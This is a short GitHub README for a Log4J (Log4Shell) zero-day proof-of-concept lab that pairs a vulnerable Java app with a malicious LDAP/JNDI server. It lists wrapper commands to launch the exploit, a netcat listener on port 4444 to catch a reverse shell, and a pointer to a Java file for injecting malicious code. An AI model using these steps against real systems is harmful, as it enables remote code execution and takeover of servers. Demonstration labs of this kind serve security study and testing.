log4j-zero-day-exploit/README.md at main · rajasoun/log4j-zero-day-exploit · GitHub

Log4J Zero Day Exploit - POC

Vulnerable Log4J App, Malicious LDAP server for JNDI injection attacks and Exploitation Snippet

Run

Open Terminal and Start the Vulnerable Java App, Malicious JNDI Server

./assist.sh poc

Open Another Terminal and Run Exploit Script

./assist.sh exploit

To View the Expolit in POC Container

./assist.sh view

Open Terminal and Run nc -lvn 4444
Open Terminal and Run ./assist.sh exploit
To shell in POC Container

./assist.sh shell

Edit jndi-exploit/src/main/java/com/rajasoun/jndi/ExportObject.java for Malicious Code Injection